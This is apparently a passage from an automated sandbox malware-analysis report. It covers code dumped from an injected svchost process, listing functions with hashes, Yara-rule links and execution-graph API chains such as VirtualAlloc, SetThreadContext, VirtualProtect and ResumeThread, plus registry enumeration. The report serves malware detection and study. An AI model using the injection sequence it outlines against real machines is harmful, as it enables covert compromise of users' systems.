                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 0AF08270324B8082EE908F13BB0459962A9BB8CFE0F185130EE4707B39DFBCC8458700
                                                        Function 0000014E25ED50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: f51a204a033d80b8679267c1f31be89dd82c60e0a798355614f27ff34b059d90
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 1102CD32619B8486D7A0CB55F99079AB7F8F3C5794F105016EA8E47B68DFBDC854CB00
                                                        Function 0000014E25ED5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: d9fcac21c386e716bf48634b26dfdb2d1c4fc5b9b771d717854196da0f0511ca
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: AD61AC3651AB44C6E7A4CB15E984B5A77E8F389794F102116EA8E47BB8DBBCC950CF00
                                                        Function 0000014E255E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 963a1978ace91ebc5c95c6f5ace322840b4e8d1a0b49158cfbdd5de4de91675c
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: D011E333EF0A0351FA641128E741BE916C97B59371F7B863AA96B063F6CAF4E8424300
                                                        Function 0000014E25EE4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 0b394f0222ad10ed4458312801fa377dc5de40dcb936ecf53148d1b0853e27b0
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 98119E32A30F5021FFE41568EE56BE911C97FAC3B8F380664A977466F68AA8C9414304
                                                        Function 0000014E255DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 9797d107109e69bce09e45c8849dd5af6dda54904592a7202821d35037d3ca46
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 0E61D233E8264282FA659BA4EF44FEE66E9FB87780F544519CA0B037B4DBB4D841C700
                                                        Function 0000014E25EDAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: fdb2a3d7d4dbc778feb0db44ec4dd92249fa2fb54b61256c6ae827feb09f3166
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: F061AE33A02B488AEB50DF65D940BDD77E9F345B98F046215EF4A17BA8DBB8C185C700
                                                        Function 0000014E255DA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: c6c76a540a17df33cf6b33b62d86c749f28f34716d9120ac06b738ee0068be7b
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 5751F433941382CAEB748F62DA40BDA77E9F356B84F184115EE4A47BE5CBB8C490C701
                                                        Function 0000014E25EDAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 44bf977dff1b5ec5671c769ff3bcf65ab199377a69307d9c1e4287435c2f443d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: A051B872101380CAEBB48F25DA44BDDB7ECF356B89F146115DA5A47BE5CBB4D690C700
                                                        Function 0000014E255D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 1999b6c2b026b6124529a4adba9e946b963ca658d3889168c5ba82a1dd7089a5
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: C351AF33A426029AEB14CF15EA54F9937D9F352FE8F558124DA17437A8EBB8D840C704
                                                        Function 0000014E255D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 3dc8e3defbb4cae5588ebab0199bf55474b8a63869ade0abb043a486d88ee41a
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: D6318A32A4264196E7149F11EA44B9937E8F742FE8F158014AE9B437A4DBBCD940CB04
                                                        Function 0000014E25EE2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 3f00fd9f30143d8ec0dc68171cd42f49f7c9ce272e972ea8ec581adce4c9e820
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: C9D10372B24A8089E751CFB9D6407DC3BF9F3547A8F244216CE5E97BA9EA74C506C340
                                                        Function 0000014E25ED14A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: b82fb3b3cd8c279cf6941b9ee5c2e82ae40e5202c2e4416826012ed8ae3623a2
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: F00188B2620B90C6EB85DF62FE0469E67E8F789F91F144028EA4E4372ADE78C050C740
                                                        Function 0000014E25EE2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 667ac3d07cb23805d030a7f0e5a818e80c7b8aff588618ff8d56236ba759a437
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 3991E472B20A5085FBA1DF75DA40BED3BE9B744BA8F244109DE0B676A5DBB4C482C700
                                                        Function 0000014E25ED7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 352795bb2acd6d720caa6935447fbf89c0e2d7ba74be2edce17ed9c1fa8f5351
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: C9113032720F0589EF40CF60ED557E833A8F759768F441E25DA6E467A5DFB8C1988380
                                                        Function 0000014E25ED253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 3de46b81bbb003b110b723b7cc6fb6e414f3f1eb92d30ba74537780c1b1e2005
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: CB71B13620178186EBF49F25EE44BEA67DCF38AB84F542026DD0B53BA9DEB5C6458700
                                                        Function 0000014E255D9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 4f5b99736065405e28801979f0886448ceaedeffcf3269bf2fc32525654e0c9f
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 99615633A02B858AEB20DF65D980BDD77B4F349B98F044215EF4A17BA8DBB8D195C740
                                                        Function 0000014E25ED2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 47ea13e0a66e27f5222f985dc41e25c44af3528301242c2dfdf270eb08d24527
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: DE51183220638181E6B5CF29AA58BFA67DEF387790F442125DD9B03BB9CAB9C504C740
                                                        Function 0000014E25EE26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: be8df8e1ec03d45ea558a2a3d3bbf99ec2db0f2b8a5c9b0990fe4d8467a9cadd
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 6141B373325A8086DBA0CF25E9447EA77E8F7987A4F504021EE4E877A4EBBCC541C740
                                                        Function 0000014E25ED94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: bb5eac71964d237cb1956cfb5dc8ea3c9076102839b00be22b734880a363d7cf
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: AC116D32215B8082EBA08F15F94079977E8F788B94F185220EECE47B69DF7CC551CB00
                                                        Function 0000014E255D7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: b5321504703d7e0147251d0ef98098a33f2915f118edd02a8ea012e53d6d95a0
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: CBE08671A81B4690DF028F62E9406D833E4EB58B64B989122995D46321FA7CD5E9C700
                                                        Function 0000014E255D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 87559b647f718a4499c20e0080e905f3e2ba32fd32d78ccb03bd9a23e031c331
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 14E08672A41B4580DF028F61E9405D873A4F758B64B989122C95D46321EA7CD5E5C300
                                                        Function 0000014E25ED1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 80f4dcfa44d35f3495c169fc2734898f5281015fff2d1e20470a50a81ec8734b
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 69118235612B4481EA89DB66AA04AA973E9F789FD0F185028DE4E47776DFB8C442C300
                                                        Function 0000014E25ED1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 8abaebeb9784320d361adda1798bbe6ec81508ad70680dff6d03265ff0a18030
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: D3E039B562170486EB458B62F90878A36E5FB89B26F148028890A07362DFBD8499C750

                                                        Execution Graph

                                                        Execution Coverage:1.7%
                                                        Dynamic/Decrypted Code Coverage:95%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:120
                                                        Total number of Limit Nodes:16
                                                        execution_graph 14735 283e0f528c8 14737 283e0f5290e 14735->14737 14736 283e0f52970 14737->14736 14739 283e0f53844 14737->14739 14740 283e0f53851 StrCmpNIW 14739->14740 14741 283e0f53866 14739->14741 14740->14741 14741->14737 14742 283e0f53ab9 14747 283e0f53a06 14742->14747 14743 283e0f53a70 14744 283e0f53a56 VirtualQuery 14744->14743 14744->14747 14745 283e0f53a8a VirtualAlloc 14745->14743 14746 283e0f53abb GetLastError 14745->14746 14746->14747 14747->14743 14747->14744 14747->14745 14748 283e0f55cf0 14749 283e0f55cfd 14748->14749 14750 283e0f55d09 14749->14750 14758 283e0f55e1a 14749->14758 14751 283e0f55d3e 14750->14751 14752 283e0f55d8d 14750->14752 14753 283e0f55d66 SetThreadContext 14751->14753 14753->14752 14754 283e0f55e41 VirtualProtect FlushInstructionCache 14754->14758 14755 283e0f55efe 14756 283e0f55f1e 14755->14756 14770 283e0f543e0 14755->14770 14766 283e0f54df0 GetCurrentProcess 14756->14766 14758->14754 14758->14755 14760 283e0f55f23 14761 283e0f55f77 14760->14761 14762 283e0f55f37 ResumeThread 14760->14762 14774 283e0f57940 14761->14774 14763 283e0f55f6b 14762->14763 14763->14760 14765 283e0f55fbf 14767 283e0f54e0c 14766->14767 14768 283e0f54e53 14767->14768 14769 283e0f54e22 VirtualProtect FlushInstructionCache 14767->14769 14768->14760 14769->14767 14772 283e0f543fc 14770->14772 14771 283e0f5445f 14771->14756 14772->14771 14773 283e0f54412 VirtualFree 14772->14773 14773->14772 14775 283e0f57949 14774->14775 14776 283e0f57954 14775->14776 14777 283e0f5812c IsProcessorFeaturePresent 14775->14777 14776->14765 14778 283e0f58144 14777->14778 14781 283e0f58320 14778->14781 14780 283e0f58157 14780->14765 14784 283e0f58331 capture_previous_context 14781->14784 14782 283e0f5833a RtlLookupFunctionEntry 14783 283e0f58389 14782->14783 14782->14784 14783->14780 14784->14782 14784->14783 14785 283e0f2273c 14786 283e0f2276a 14785->14786 14787 283e0f227c5 VirtualAlloc 14786->14787 14789 283e0f228d4 14786->14789 14787->14789 14790 283e0f227ec 14787->14790 14788 283e0f22858 LoadLibraryA 14788->14790 14790->14788 14790->14789 14791 283e0f51abc 14796 283e0f51628 GetProcessHeap HeapAlloc 14791->14796 14793 283e0f51ad2 Sleep SleepEx 14794 283e0f51acb 14793->14794 14794->14793 14795 283e0f51598 StrCmpIW StrCmpW 14794->14795 14795->14794 14840 283e0f51268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14796->14840 14798 283e0f51650 14841 283e0f51268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14798->14841 14800 283e0f51661 14842 283e0f51268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14800->14842 14802 283e0f5166a 14843 283e0f51268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14802->14843 14804 283e0f51673 14805 283e0f5168e RegOpenKeyExW 14804->14805 14806 283e0f518a6 14805->14806 14807 283e0f516c0 RegOpenKeyExW 14805->14807 14806->14794 14808 283e0f516e9 14807->14808 14809 283e0f516ff RegOpenKeyExW 14807->14809 14850 283e0f512bc RegQueryInfoKeyW 14808->14850 14811 283e0f5173a RegOpenKeyExW 14809->14811 14812 283e0f51723 14809->14812 14815 283e0f51775 RegOpenKeyExW 14811->14815 14816 283e0f5175e 14811->14816 14844 283e0f5104c RegQueryInfoKeyW 14812->14844 14819 283e0f51799 14815->14819 14820 283e0f517b0 RegOpenKeyExW 14815->14820 14818 283e0f512bc 16 API calls 14816->14818 14824 283e0f5176b RegCloseKey 14818->14824 14821 283e0f512bc 16 API calls 14819->14821 14822 283e0f517d4 14820->14822 14823 283e0f517eb RegOpenKeyExW 14820->14823 14825 283e0f517a6 RegCloseKey 14821->14825 14826 283e0f512bc 16 API calls 14822->14826 14827 283e0f51826 RegOpenKeyExW 14823->14827 14828 283e0f5180f 14823->14828 14824->14815 14825->14820 14829 283e0f517e1 RegCloseKey 14826->14829 14831 283e0f5184a 14827->14831 14832 283e0f51861 RegOpenKeyExW 14827->14832 14830 283e0f5104c 6 API calls 14828->14830 14829->14823 14833 283e0f5181c RegCloseKey 14830->14833 14834 283e0f5104c 6 API calls 14831->14834 14835 283e0f51885 14832->14835 14836 283e0f5189c RegCloseKey 14832->14836 14833->14827 14838 283e0f51857 RegCloseKey 14834->14838 14837 283e0f5104c 6 API calls 14835->14837 14836->14806 14839 283e0f51892 RegCloseKey 14837->14839 14838->14832 14839->14836 14840->14798 14841->14800 14842->14802 14843->14804 14845 283e0f511b5 RegCloseKey 14844->14845 14846 283e0f510bf 14844->14846 14845->14811 14846->14845 14847 283e0f510cf RegEnumValueW 14846->14847 14848 283e0f51125 14847->14848 14848->14845 14848->14847 14849 283e0f5114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14848->14849 14849->14848 14851 283e0f51327 GetProcessHeap HeapAlloc 14850->14851 14852 283e0f5148a RegCloseKey 14850->14852 14853 283e0f51476 GetProcessHeap HeapFree 14851->14853 14854 283e0f51352 RegEnumValueW 14851->14854 14852->14809 14853->14852 14856 283e0f513a5 14854->14856 14856->14853 14856->14854 14857 